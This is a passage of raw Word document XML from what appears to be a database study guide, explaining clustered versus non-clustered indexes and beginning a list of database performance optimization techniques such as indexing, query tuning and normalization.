          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Defines the physical order of rows in the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BAAA4F" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-Clustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Maintains a separate logical order with pointers to the actual rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522480A0" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Number of Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D67517D" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Clustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Only one per table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAE20AB" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-Clustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Multiple indexes can be created per table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36282E6B" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8980BC" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Clustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Best for range queries and large result sets due to ordered data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1C792D" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-Clustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Efficient for specific lookups and queries on non-indexed columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6174C3" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Cases</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C92645" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Clustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ideal for primary keys and columns frequently used in range queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CDFF35" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-Clustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Suitable for columns frequently used in search conditions, joins, or filters that are not covered by the clustered index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C45B6F" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Choosing Between Clustered and Non-Clustered Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F4A098" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Clustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Choose for columns that are often queried in a range or sorted order, such as primary keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC1B6F2" w14:textId="77777777" w:rsidR="00B10DC5" w:rsidRPr="00DA2F32" w:rsidRDefault="00B10DC5" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-Clustered Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Choose for columns frequently used in search conditions or queries, especially when multiple different queries benefit from different indexing strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49210898" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29445507" w14:textId="13537F9F" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc178383306"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are some common optimization techniques for improving the performance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w14:paraId="32E0303D" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Optimizing database performance is crucial for ensuring that applications run efficiently and can scale as data grows. Here are some key techniques to improve database performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA75C51"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1. Indexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D6631" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Create Appropriate Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use clustered and non-clustered indexes on frequently queried columns, especially those used in WHERE, JOIN, ORDER BY, and GROUP BY clauses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63964CAD" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid Over-Indexing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: While indexes improve read performance, they can degrade write performance (inserts, updates, deletes) because the indexes must be updated as well. Only index columns that are frequently searched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180871D3" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Use Covering Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: An index that includes all the columns needed for a query, allowing the database to fulfill the query from the index alone without accessing the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1703717D"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2. Query Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2586F9" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Query Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Cache the results of expensive queries that are frequently executed with the same parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB7F200" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid SELECT * Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Only select the columns you need instead of all columns in a table. This reduces I/O and memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CBA113" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Optimize Joins</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that the columns used in joins are indexed. Prefer joins over subqueries where possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF1CC9" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid N+1 Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Retrieve all related data in a single query instead of repeatedly querying the database within a loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55301E6A" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Proper Query Plan Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use tools like EXPLAIN (in MySQL) or EXPLAIN ANALYZE (in PostgreSQL) to understand and optimize the execution plans of your queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320BA8B8"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3. Database Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04545704" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Normalize to Reduce Redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Normalize the database to eliminate redundancy and ensure data integrity. However, avoid over-normalization as it can lead to complex joins and slower queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329AE276" w14:textId="77777777" w:rsidR="00234980" w:rsidRPr="00DA2F32" w:rsidRDefault="00234980" w:rsidP="009E0607">
